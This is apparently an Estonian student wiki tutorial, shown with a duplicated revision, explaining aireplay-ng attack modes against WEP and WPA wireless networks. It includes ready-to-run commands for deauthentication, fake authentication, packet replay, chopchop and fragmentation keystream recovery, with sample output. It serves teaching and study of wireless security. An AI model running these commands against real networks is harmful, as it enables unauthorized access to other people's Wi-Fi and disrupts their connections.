PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre>$ sudo aireplay-ng -4 -h CC:CC:CC:CC:CC:CC -b AA:AA:AA:AA:AA:AA ath0
Read 165 packets...

Size: 86, FromDS: 1, ToDS: 0 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.."
0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
0x0050: cfeb 4a72 be46 ..Jr.F

Use this packet ? y

Saving chosen packet in replay_src-0001-123456.cap

Offset 85 ( 0% done) | xor = D3 | pt = 95 | 253 frames written in 760ms
Offset 84 ( 1% done) | xor = EB | pt = 55 | 166 frames written in 498ms
Offset 83 ( 3% done) | xor = 47 | pt = 35 | 215 frames written in 645ms
Offset 82 ( 5% done) | xor = 07 | pt = 4D | 161 frames written in 483ms
Offset 81 ( 7% done) | xor = EB | pt = 00 | 12 frames written in 36ms
...
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0001-123457.cap
Saving keystream in replay_dec-0001-123456.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugemiseks paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks ''bit flippingut''. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-24T19:06:23Z

Tliiv: /* Klientideta võrgu ründamine */

=Autor=
Tanel Liiv D22 (2011)

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0
21:36:02 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]
21:36:05 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]
...
</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0
21:33:25 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:33:25 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:28 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
...
</pre>
Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
21:40:20 Sending Authentication Request
21:40:20 Authentication successful
21:40:20 Sending Association Request
21:40:20 Association successful :-)
...
</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>...
15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

<pre>
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -d FF:FF:FF:FF:FF:FF -t 1 mon0
Read 4 packets...

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0841 de00 0014 6c7e 4080 000f b534 3030 .A....l~@....400
0x0010: ffff ffff ffff 4045 d16a c800 6f4f ddef ......@E.j..oO..
0x0020: b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162 ...|.*d....c..Ab
0x0030: 8ad9 2f74 16bb abcf 232e 97ee 5e45 754d ../t....#...^EuM
0x0040: 23e0 883e #..>

Use this packet ? y
</pre>

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

<pre>
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0
Read 10 packets...

Size: 124, FromDS: 0, ToDS: 1 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = BB:BB:BB:BB:BB:BB
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0841 2c00 0014 6c7e 4080 000f b534 3030 .A,...l~@....400
0x0010: 0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7 .@.w....=y...Y+.
0x0020: 96e7 fadf e0de 2e99 c019 4f85 9508 3bcc ..........O...;.
0x0030: 8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7 ..........X...{.
0x0040: 8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d ..i...;.Cj..v,..
0x0050: 7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913 zW?=.<.....emf..
0x0060: 9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825 ....o..h+ U...%
0x0070: bf22 960a 5c7b 3036 290a 89d6 ."..\{06)...

Use this packet ? y
</pre>

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>$ sudo aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0
...
</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

<pre>
$ sudo aireplay-ng -3 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
Saving ARP requests in replay_arp-0001-123456.cap
You should also start airodump-ng to capture replies.
Read 11978 packets (got 7193 ARP requests), sent 3902 packets...
</pre>

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks ''bit flippingut''. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

